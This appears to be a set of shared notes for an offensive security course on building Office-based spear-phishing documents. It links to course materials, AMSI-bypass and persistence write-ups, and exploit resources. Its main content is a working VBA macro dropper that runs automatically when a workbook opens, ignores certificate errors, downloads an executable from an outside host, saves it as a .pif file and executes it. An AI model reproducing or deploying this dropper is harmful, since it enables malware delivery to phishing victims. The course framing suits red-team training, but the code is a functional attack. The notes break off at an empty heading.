# Office Vulnerability Spear-Phishing Development in Practice

Discord: https://discord.gg/43rC374F

zha0's course materials: https://drive.google.com/drive/folders/1ch6SiyK_2GUbtEl8Ylfom5kmsP1nIUQ3?usp=sharing

Shared notes for this course:

* Day1 https://hackmd.io/@Not/ccoe2021_01
* Day2 https://hackmd.io/@Not/ccoe2021_02
* Day3 https://hackmd.io/@Not/ccoe2021_03
* Discussion notes: https://docs.google.com/document/d/1PSSzlyeGWnK-DeXPbK84KpcWFZFOI1JQFTMMcO-J1Is/edit
* Day4 https://hackmd.io/@Not/ccoe2021_04

# Instructor, drink some water! Thanks for the hard work!!!!!

-> [Exam](https://forms.gle/MQA99i7CKZZXc2rd8)

[Course materials package @ OneDrive](https://1drv.ms/u/s!AgFJGv5jxW7fgs1s6IrbGMiZ-ptxrA?e=QdUD6y)

## Supplementary material

* [Intranet lateral movement - Excel4-DCOM](https://github.com/outflanknl/Excel4-DCOM)
* [Outflank: Bypass AMSI for VBA](https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/)
* [Using Office for system persistence](https://mp.weixin.qq.com/s/SZPmGDfDIpK3fP5nlHUcMA)
* [On Office Moniker vulnerabilities and Equation Editor vulnerabilities](https://www.anquanke.com/post/id/231427)

## Dropper Example

```vba
Sub Workbook_Open()
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", "http://arsenal.30cm.tw/picaball.exe", False
    WinHttpReq.Send

    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write WinHttpReq.ResponseBody
    oStream.SaveToFile "123.pif", 2 ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
    oStream.Close

    Shell "cmd /c 123.pif"
End Sub
```

----

-> [64-bit Function Pointer (VBA)](https://gist.github.com/aaaddress1/4d50204b956721c721acc84f843a1b15)

-> [PE to Shellcode](https://github.com/hasherezade/pe_to_shellcode/releases/tag/v0.9)

Q: Does 64-bit refer to the OS or to Office?

A: Office

Please work through chapter 7 of the book.
https://gist.github.com/aaaddress1/1ca8fe5ba25b0fa422aca6cddb479bc6

How to download Office 365 x64: https://support.microsoft.com/zh-tw/office/%E5%9C%A8-pc-%E6%88%96-mac-%E4%B8%8A%E4%B8%8B%E8%BC%89%E4%B8%A6%E5%AE%89%E8%A3%9D%E6%88%96%E9%87%8D%E6%96%B0%E5%AE%89%E8%A3%9D-microsoft-365-%E6%88%96-office-2021-4414eaaf-0478-48be-9c42-23adc4716658#InstallSteps=PC_step-by-step

---

## XLUnicodeStringNoCch string injection tricks